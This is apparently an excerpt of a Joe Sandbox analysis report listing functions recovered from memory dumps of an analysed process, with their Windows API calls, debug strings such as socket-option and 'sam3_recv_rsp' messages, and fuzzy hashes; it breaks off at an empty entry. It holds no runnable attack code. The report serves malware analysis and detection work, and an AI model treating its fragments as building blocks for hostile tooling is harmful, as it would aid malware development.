Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: b7910580d3c89d53adf9108fdd7655c2341bdd227db08ebf00b35b0a1738a65b
Instruction ID: 70dc7ea8fa50fdbed110b47843d931578ceacb8284586ebcb3a0900fa7046183
Opcode Fuzzy Hash: b7910580d3c89d53adf9108fdd7655c2341bdd227db08ebf00b35b0a1738a65b
Instruction Fuzzy Hash: CBF0B161B08142C6F3505B66B4005A66551FB88764F044137EDED837B8DF7CD949C700

Function 00007FFE126D152A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE126D155A
WSAGetLastError.WS2_32 ref: 00007FFE126D1571

Strings

tcp_set_nodelay, xrefs: 00007FFE126D1581
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126D1588

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: a38d3d85025679210775f2dd95c36e3eabbea3f50d9042afafabc5e59aa88030
Instruction ID: d94a2d9c37149ee3270909e9cfbc0be671d1844e7b346bded230d46b4a79778e
Opcode Fuzzy Hash: a38d3d85025679210775f2dd95c36e3eabbea3f50d9042afafabc5e59aa88030
Instruction Fuzzy Hash: A9F096A1A089468AF7109B2BBC406B56661EB947B4F0082B1ED6D837F8DEBCD549CB00

Function 00007FFE11EC40BA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11EC40EA
WSAGetLastError.WS2_32 ref: 00007FFE11EC4101

Strings

tcp_set_nodelay, xrefs: 00007FFE11EC4111
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC4118

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: c786cd30c200715e9b9f3fc006fbf942f08d920c68ea867736f01aa526706d9d
Instruction ID: d345ecdbe61421b054c752b2ebdc13643dc1c48d6b6cb249e3aa46a747f92cbc
Opcode Fuzzy Hash: c786cd30c200715e9b9f3fc006fbf942f08d920c68ea867736f01aa526706d9d
Instruction Fuzzy Hash: 63F02B61B0C95286F7109FABBC002A76564BB84774F449271ED6D837F4DE3CE549C700

Function 00007FFE0E16ADDA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0E16AE0A
WSAGetLastError.WS2_32 ref: 00007FFE0E16AE21

Strings

tcp_set_nodelay, xrefs: 00007FFE0E16AE31
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E16AE38

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 59d7653ef6b810c573ce67dbddc6f1998876698b41c5f13ea5785c6b21fa4502
Instruction ID: 58f2151a824901ace4306ba38c769762b6b85ae028126e712bf324470b2bd7ed
Opcode Fuzzy Hash: 59d7653ef6b810c573ce67dbddc6f1998876698b41c5f13ea5785c6b21fa4502
Instruction Fuzzy Hash: FFF02B71B0C1428AF3105F65F8005A66661AF84B60F448233EDED837B5DF7CD94ACB00

Function 00007FFE0EB41ECA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EB41EFA
WSAGetLastError.WS2_32 ref: 00007FFE0EB41F11

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB41F28
tcp_set_nodelay, xrefs: 00007FFE0EB41F21

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: c5eef0ac53a77a643dc5dd434250c134fc18672fd7dc470e485df4f196bd4b57
Instruction ID: ea3df3a9fbd1c7bd7cce303d57582202abd764604fb63550cc4a965a9e88cb39
Opcode Fuzzy Hash: c5eef0ac53a77a643dc5dd434250c134fc18672fd7dc470e485df4f196bd4b57
Instruction Fuzzy Hash: 06F096A3F1864286F3205F29A8006B66561EB84794F404235EEED837F8DF7CD946CF00

Function 00007FFE126D1596 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE126D15BE
WSAGetLastError.WS2_32 ref: 00007FFE126D15D5

Strings

[E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126D15EC
tcp_set_keepalive, xrefs: 00007FFE126D15E5

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
API String ID: 1729277954-536111009
Opcode ID: 9867e54280154e7b9a3a4cdcb5c4b1052708605af9dda341dab169b997e877e5
Instruction ID: 4c29a63b3e65c1393c99aef5acd2827b62567ea3a082a265092232aee9577b39
Opcode Fuzzy Hash: 9867e54280154e7b9a3a4cdcb5c4b1052708605af9dda341dab169b997e877e5
Instruction Fuzzy Hash: 9EF0BB61A1894686F7109B27BC4057566A0FF847B4F104271ED6D837F4DEFCD5098B00

Function 00007FFE126DB132 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FFE126DB16B
strchr.MSVCRT ref: 00007FFE126DB1B7

Strings

sam3_recv_rsp, xrefs: 00007FFE126DB1D1
[D] (%s) -> %s, xrefs: 00007FFE126DB1D8

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: memsetstrchr
String ID: [D] (%s) -> %s$sam3_recv_rsp
API String ID: 2564583029-4292814133
Opcode ID: b43e11e523420d980cc510fa71f7f54ffd739c9cfb992ba78ea50428caf00919
Instruction ID: 45bc9162b0441ee06ba7e9fd5a5a5a8fd6b6d0bf42b2ae12d5d94d477d8bdcb7
Opcode Fuzzy Hash: b43e11e523420d980cc510fa71f7f54ffd739c9cfb992ba78ea50428caf00919
Instruction Fuzzy Hash: 02216D12F0CE9F47FA215A2B9C5437915405F06BB0F1843B1EEBD4A7EAED9CA8428301

Function 00007FFE0E131290 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E1312C9
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E13134B

Strings

ebus_dispatch, xrefs: 00007FFE0E13132F
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0E131336

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: dd72387e13e98889c55651ba2217bbe6d146ade0cf969d2aa47e14591c4ae9b9
Instruction ID: 20006e3347bb6f1a5ac8eaa54932fc78e3cce2a369272d7b73d1e02918c339ff
Opcode Fuzzy Hash: dd72387e13e98889c55651ba2217bbe6d146ade0cf969d2aa47e14591c4ae9b9
Instruction Fuzzy Hash: B2210B72A09B46D5EB618F25F84026DB360FB48B94B544136DAED87BB8DF3CD895C700

Function 00007FFE126D5F90 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE126D5FC9
LeaveCriticalSection.KERNEL32 ref: 00007FFE126D604B

Strings

ebus_dispatch, xrefs: 00007FFE126D602F
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE126D6036

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: b3dfa94311c8b84ceee6a75c31448f86a05eb3f31c273551a0a4ff09e043467c
Instruction ID: 8fa30343936b55281386e9b74d76ddb5296d1d718fd7b424478bd4e9d37eff11
Opcode Fuzzy Hash: b3dfa94311c8b84ceee6a75c31448f86a05eb3f31c273551a0a4ff09e043467c
Instruction Fuzzy Hash: F2214F32A08E8A86EB50CF16FC405696364FB94BA4F584171DA9D47BF8DF7CD856C700

Function 00007FFE0E16A250 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E16A289
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16A30B

Strings

ebus_dispatch, xrefs: 00007FFE0E16A2EF
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0E16A2F6

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: abe5f35f3c3aae9c3b5b648d907283798934e6446cc0c3a7aa2c6f94d3ff3ba4
Instruction ID: 282061c310a4db40974a470734113d4f0f53ad43e7350501ab184cdb9068a39d
Opcode Fuzzy Hash: abe5f35f3c3aae9c3b5b648d907283798934e6446cc0c3a7aa2c6f94d3ff3ba4
Instruction Fuzzy Hash: 89214A32A08A8782EB658F25E94016973A0FF58F94F184136DADE577B9DF3CE885C740

Function 00007FFE0EB41290 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EB412C9
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB4134B

Strings

[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0EB41336
ebus_dispatch, xrefs: 00007FFE0EB4132F

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 53be27b5488155eb9d11ec7e73c08101b340e636c0ab373d64c12a5dd52b1cd8
Instruction ID: 0877965e7c6f19da52155e4b76aa2280994945573815de448931bd6a63ff310a
Opcode Fuzzy Hash: 53be27b5488155eb9d11ec7e73c08101b340e636c0ab373d64c12a5dd52b1cd8
Instruction Fuzzy Hash: B1210B72A09B4682EB759F15E840269B7A0FB44B94F184131DA9D877B8DF3CD895CB00

Function 00007FF6EF65550C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
Instruction ID: 21367feb97e7ce12d760d7fd804b87628b0895d2f3d00d3b53896461f4ca9d18
Opcode Fuzzy Hash: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
Instruction Fuzzy Hash: C7F05E2BB1821243F9539B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAD86A306

Function 00007FF6EF655505 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
Instruction ID: 21367feb97e7ce12d760d7fd804b87628b0895d2f3d00d3b53896461f4ca9d18
Opcode Fuzzy Hash: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
Instruction Fuzzy Hash: C7F05E2BB1821243F9539B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAD86A306

Function 00007FF6EF6554FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
Instruction ID: 21367feb97e7ce12d760d7fd804b87628b0895d2f3d00d3b53896461f4ca9d18
Opcode Fuzzy Hash: d8c1f832ea4430a5cee2a0dc09156cf43c75561979e32153b5d5027b2f0f6722
Instruction Fuzzy Hash: C7F05E2BB1821243F9539B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAD86A306

Function 00007FF6EF655396 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
Instruction ID: f27c1d457d57cf753e759cd64cfd6058fbdbd6a73e999af721828410d372ccfc
Opcode Fuzzy Hash: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
Instruction Fuzzy Hash: 65F05E27B1821243F9529B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAC86A306

Function 00007FF6EF65538C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
Instruction ID: 65ea38442251091a9576cd3dc29a11fa6f8f7917f1cf4be7e2b87c2d8fab1a0e
Opcode Fuzzy Hash: 818da8196cb84a01bb97c639c4f07d118bc4aba2fcbbab1dbc363c6cbe084887
Instruction Fuzzy Hash: 6DF05E27B1821243F9529B04B4407B9135A1F4577CF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF655378 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

